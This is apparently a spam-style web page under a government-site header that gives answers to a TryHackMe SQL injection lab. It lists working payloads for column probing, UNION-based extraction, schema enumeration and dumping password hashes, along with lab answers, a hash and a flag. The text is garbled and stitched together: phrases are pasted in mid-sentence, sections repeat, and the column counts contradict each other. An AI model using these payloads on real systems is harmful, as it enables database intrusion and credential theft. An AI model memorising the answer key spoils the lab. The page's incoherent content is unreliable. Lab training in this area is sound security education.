An official website of the United States government
United States Department of Labor
Tryhackme Sql Injection Lab Answers [patched]
The TryHackMe SQL Injection lab covers various techniques for exploiting database vulnerabilities. Below are the key steps and answers for the different tasks found within the room. 1. Finding the Vulnerability
The first step is identifying where the application interacts with the database. Look for URL parameters like ?id=1. Inject a single quote (') to trigger an error.
A database error message confirms the input is not being sanitized. 2. Determining Column Count
To perform a UNION based attack, you must know how many columns the original query returns. Use the ORDER BY clause incrementally. Payload: ' ORDER BY 1--, ' ORDER BY 2--, etc.
If ORDER BY 4-- works but ORDER BY 5-- fails, there are 4 columns. 3. Extracting Database Information
Once the column count is known, use UNION SELECT to retrieve data. Database Name: ' UNION SELECT 1,2,database(),4-- Database Version: ' UNION SELECT 1,2,version(),4-- Current User: ' UNION SELECT 1,2,user(),4-- 4. Enumerating Database Structure
In many SQL environments, metadata can be accessed to understand the structure of the database.
Table Enumeration: This involves querying schema information to identify the names of tables existing within the database. tryhackme sql injection lab answers
Column Discovery: Once a table of interest is identified, the next step involves determining the specific names of columns within that table to understand what data is stored. 5. Data Retrieval and Flags
The final stage of the lab involves using the established UNION query to pull specific information from the identified tables. In the context of TryHackMe, this usually involves locating a specific "flag" string.
Methodology: Combine the column names and table names discovered in the previous steps into a final UNION SELECT statement.
Goal: Successfully display the contents of the target fields on the webpage to capture the flag required for the task. 6. Mitigation and Prevention
Understanding how to exploit these vulnerabilities is the first step toward preventing them.
Parameterized Queries: Use prepared statements so that user input is never interpreted as SQL command logic.
Input Validation: Implement strict allow-lists for user input. The TryHackMe SQL Injection lab covers various techniques
Principle of Least Privilege: Ensure the database user account used by the application has the minimum permissions necessary. Lab Completion Tips 💡
Check Syntax: Ensure comments like -- or # are used correctly to neutralize the remainder of the original SQL query.
Data Types: When using UNION, the data types in the injected columns must match the data types in the original query.
Stay Ethical: These techniques are intended for authorized security testing and educational purposes only.
Task 2 – What is SQL Injection?
Q1: What statement is used to retrieve data from a database?
Answer: SELECT
Q2: What character comments out the rest of a SQL query?
Answer: -- (or #)
Solution
-
Step 1: Use the following payload to dump the table data:
' UNION SELECT NULL,NULL,NULL FROM users -- -Solution- The response will contain the table data.
Conclusion
In this lab, we explored how to identify and exploit SQL injection vulnerabilities. We covered basic SQL injection, union-based SQL injection, error-based SQL injection, and blind SQL injection. By completing these challenges, you have gained hands-on experience in detecting and exploiting SQL injection vulnerabilities.
Step 1: Identifying the Vulnerability
The application uses a SQL query to retrieve employee data:
SELECT * FROM employees WHERE id = '$id';
The $id variable is user-input, which makes it vulnerable to SQL injection attacks.
Task 4 – In-band SQLi (Union-based)
Lab: Search products by ID
Step 1 – Find number of columns:
' ORDER BY 1 -- - (increase until error)
Columns found: 3
Step 2 – Union payload:
' UNION SELECT 1,2,3 -- -
Q1: What table name holds user credentials?
' UNION SELECT 1,group_concat(table_name),3 FROM information_schema.tables WHERE table_schema=database() -- -
Answer: users
Q2: What is the admin password hash?
' UNION SELECT 1,group_concat(password),3 FROM users -- -
Answer: 5f4dcc3b5aa765d61d8327deb882cf99
Q3 (flag):
Answer: THMUnion_Based_SQLi
